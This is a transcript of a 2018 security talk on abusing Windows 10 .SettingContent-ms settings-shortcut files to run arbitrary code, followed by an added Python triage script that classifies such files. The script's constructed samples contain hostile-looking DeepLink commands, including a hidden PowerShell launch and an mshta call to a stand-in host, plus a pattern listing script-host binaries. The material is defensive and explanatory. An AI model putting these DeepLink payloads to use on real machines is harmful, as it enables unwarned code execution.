The Magic Extension (.SettingContent-ms)

ripjyr
June 29, 2018


Attacks that abuse .SettingContent-ms files have now been seen in the wild.
This is the material I presented at a LAC internal meeting on June 29, 2018.
Since the details have already been published in Japanese, I am making it public here as well.

- On Windows 10, arbitrary code can be written into a file with the ".SettingContent-ms" extension | Slashdot Japan Security
- New technique discovered that spreads malware infections without using macros | Mynavi News


Transcript

  1. CYBER - EDUCATION - PENTEST - JSOC - 119 - CONSULTING  We provide IT total solutions based on advanced

    security technologies. supports your Business  LAC  [date illegible]  LAC Co., Ltd., Cyber Security Division  Matcha Daifuku  ©LAC Co., Ltd.  The Magic Extension
  2. A Windows 10 "Settings" shortcut file can be used to execute arbitrary code

  3. Extension: .SettingContent-ms

  4. Its original purpose is launching "Settings" items.  Windows Smart Tuning (337), Win 10 TP edition: Opening Windows Update in "Settings" from a shortcut file | Mynavi News

    → https://news.mynavi.jp/article/windows-337/
  5. The extension disappears! (Explorer does not show ".SettingContent-ms" in the file name, so the file looks like a plain settings shortcut)

  6. A PoC that launches calc.exe is on GitHub!!!  test.SettingContent-ms · GitHub → https://gist.github.com/enigma0x3/b948b81717fd6b72e0a4baca033e07f8

  7. Let's actually try it

  8. cmd.exe appears for an instant, then calc.exe launches

  9. The downloaded file is in the Internet zone (it carries the Zone.Identifier mark-of-the-web)

  10. calc.exe launches with no warning at all, despite the Internet-zone mark

  11. Disclosure timeline (quoted from enigma0x3):

    2/16/2018: Report sent MSRC
    2/16/2018: MSRC acknowledged the report, case number assigned
    3/2/2018: MSRC confirmed that they could reproduce the issue
    4/24/2018: Requested status update
    4/25/2018: MSRC informed me of a case handler change. An update was requested from the engineering team and would be relayed to me ASAP
    6/1/2018: Requested another update from MSRC
    6/4/2018: MSRC responded with a note that the severity of the issue is below the bar for servicing and that the case will be closed.
    6/11/2018: Report published
    MS apparently has no intention of fixing it and closed the case as "by design".  June | 2018 | enigma0x3 → https://enigma0x3.net/2018/06/
  12. Dangerous if it gets embedded as an OLE object (e.g. in an Office document)!
    → They will probably add it to the blocklist (the list of file types Office's OLE Packager refuses to activate)
    Windows Settings Shortcuts Can Be Abused for Code Execution on Windows 10
    → https://www.bleepingcomputer.com/news/security/windows-settings-shortcuts-can-be-abused-for-code-execution-on-windows-10/
  13. A PoC that runs PowerShell is also out (Thanks Ishikawa-san)  Updated: [date illegible]
    SettingContent-MS-File-Execution/LoadPowershellDemo.SettingContent-MS at master · bvoris/SettingContent-MS-File-Execution · GitHub →

    https://github.com/bvoris/SettingContent-MS-File-Execution/blob/master/LoadPowershellDemo.SettingContent-MS
  14. A PoC that uses mshta.exe is also out (unclear whether it works)  Updated: [date illegible]  JUN 23RD, 2018
    <?xml version="1.0" encoding="UTF-8"?> <PCSettings> <SearchableContent xmlns - pastebin.com

    → https://pastebin.com/HaBb87Av
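The PoCs on slides 6, 13 and 14 all work the same way: a .SettingContent-ms file is plain XML, and Windows runs whatever command the DeepLink element contains. The following triage script is an added example written for this page; it is not code from the slides or from any of the PoC authors linked above. It parses the XML, pulls out DeepLink, and classifies the file. The element names (PCSettings, SearchableContent, ApplicationInformation, DeepLink) follow the public PoC format; the assumption that a benign DeepLink always points at control.exe or an ms-settings: URI, the list of script hosts treated as malicious, and all sample files are constructed for this example.

```python
"""Triage .SettingContent-ms files by inspecting the DeepLink element.

Windows launches whatever DeepLink names, so the element is the whole story:
legitimate Settings shortcuts point at control.exe or an ms-settings: URI,
the public PoCs point at cmd.exe, powershell.exe or mshta.exe.
Every sample below is constructed for this example.
"""
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Assumption: a benign DeepLink is control.exe (optionally "/name <item>")
# or an ms-settings: URI. Anything else is at least suspicious.
BENIGN_DEEPLINK = re.compile(
    r"^(?:%windir%\\system32\\control\.exe(?:\s+/name\s+\S+)?|ms-settings:\S*)$",
    re.IGNORECASE,
)
# Script hosts / living-off-the-land binaries used by the PoCs (assumed list).
LOLBIN = re.compile(
    r"""(?:^|[\\\s"'])(?:cmd|powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32|certutil)(?:\.exe)?\b""",
    re.IGNORECASE,
)


def extract_deeplink(xml_data):
    """Return the DeepLink text (namespace-agnostic), or None if there is none."""
    if isinstance(xml_data, str):
        xml_data = xml_data.encode("utf-8")  # lets the XML declaration be honoured
    root = ET.fromstring(xml_data)
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] == "DeepLink":
            return (el.text or "").strip()
    return None


def classify(xml_data):
    """Return (verdict, deeplink); verdict is benign / suspicious / malicious /
    no-deeplink / malformed."""
    try:
        deeplink = extract_deeplink(xml_data)
    except ET.ParseError:
        return ("malformed", None)
    if deeplink is None:
        return ("no-deeplink", None)
    if BENIGN_DEEPLINK.match(deeplink):
        return ("benign", deeplink)
    if LOLBIN.search(deeplink):
        return ("malicious", deeplink)
    return ("suspicious", deeplink)  # unknown binary: escalate for a look


def make_sample(deeplink):
    """Build a minimal SettingContent-ms document around a DeepLink (constructed)."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>{escape(deeplink)}</DeepLink>
      <Icon>%windir%\\system32\\control.exe</Icon>
    </ApplicationInformation>
  </SearchableContent>
</PCSettings>
"""


# Constructed samples: one Settings-style shortcut, the three PoC shapes, and
# an unknown binary such as a dropped second stage.
SAMPLES = {
    "settings_item": make_sample(r"%windir%\system32\control.exe /name Microsoft.WindowsUpdate"),
    "calc_poc": make_sample(r"%windir%\system32\cmd.exe /c calc.exe"),
    "powershell_poc": make_sample(
        r"%windir%\system32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -w hidden -c calc.exe"),
    "mshta_poc": make_sample(r"%windir%\system32\mshta.exe http://example.invalid/payload.hta"),
    "unknown_binary": make_sample(r"C:\Users\Public\update.exe"),
}


def triage_all(samples=SAMPLES):
    """Classify every sample; returns {name: verdict}."""
    return {name: classify(doc)[0] for name, doc in samples.items()}


if __name__ == "__main__":
    for name, verdict in triage_all().items():
        print(f"{name:16s} {verdict}")
```

In a real deployment the same `classify` call would be run over files written to the Downloads folder or extracted from Office documents as OLE Packager objects, with anything other than `benign` quarantined; the Zone.Identifier mark is irrelevant here because, as slide 10 shows, Windows does not consult it before launching the DeepLink.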
  15. Symantec Cloud detects this extension  Updated: [date illegible]  Information as of: [date illegible]

  16. Abused by malware!!!! (Thanks Ishikawa-san) (1/2)  Updated: [date illegible]  VirusTotal → https://www.virustotal.com/ja/file/09666731EFAB134CB6C882902D64B5E22D664FCAA4B97211D8C66AAC966709A4/analysis/

  17. VirusTotal → https://www.virustotal.com/#/file/51b06db04512d3e3c415b015be59a324c940e9538e47ff8ebfe340188bffbb84/detection  The downloaded LAW231.exe is apparently the REMCOS RAT.  Abused by malware!!!! (Thanks Ishikawa-san) (2/2)

  18. Thank you. Any Questions?